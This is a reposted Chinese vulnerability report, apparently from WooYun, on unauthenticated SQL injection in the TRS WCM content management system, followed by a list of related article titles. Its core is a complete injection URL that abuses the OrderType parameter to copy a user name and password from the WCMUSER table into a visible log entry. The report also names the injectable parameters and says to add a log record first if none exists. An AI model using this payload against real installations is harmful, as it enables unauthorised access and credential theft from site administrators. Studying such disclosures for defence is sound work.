TRS WCM SQL injection

简介: 来源http://www.wooyun.org/bugs/wooyun-2013-019753首先是这个页面,好像是越权了http://xxxx/portal/db/dbupdatelog_list.

来源http://www.wooyun.org/bugs/wooyun-2013-019753

首先是这个页面,好像是越权了
http://xxxx/portal/db/dbupdatelog_list.jsp
正常应该要登陆才能看吧?
直接注入
http://xx/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG

注:存在注入参数为:OrderType 和 OrderField
即把查询记录显示在结果里,要是没有记录,可以自己加一条
http://xxxxx/portal/db/dbupdatelog_addedit.jsp

另,源码在这里存在:
http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp

目录
相关文章
|
SQL Java 数据库连接
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
572 0
|
SQL 安全 网络安全
SQL注入(SQL Injection)
【8月更文挑战第11天】
854 3
|
SQL 安全 网络安全
DVWA SQL Injection (Blind) 通关解析
DVWA SQL Injection (Blind) 通关解析
|
SQL Oracle Java
SQL 注入神器:jSQL Injection 保姆级教程
SQL 注入神器:jSQL Injection 保姆级教程
java.sql.SQLException: sql injection violation
本文目录 1. 报错信息 2. 问题分析 3. 排除法 4. 解决方案
4354 0
|
SQL 安全 数据库
[dvwa] sql injection
[dvwa] sql injection
|
SQL 安全 数据库
[dvwa] sql injection(Blind)
[dvwa] sql injection(Blind)
|
SQL 安全 关系型数据库
DVWA-SQL注入(SQL Injection)低/中/高级别
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤
2584 2
DVWA-SQL注入(SQL Injection)低/中/高级别
|
SQL 安全 Linux
kali linux 网络渗透测试学习笔记(二)OWASP ZAP工具扫描SQL injection漏洞失败
按照惯例,利用OWASP ZAP工具扫描SQL injection漏洞时,应该很快就可以扫描出来,但是在笔者进行扫描的时候,却遇到了以下状况: 这说明了该工具根本就没能够扫描出SQL注入的漏洞,不知道该如何解决。
2590 0
|
SQL 关系型数据库 Java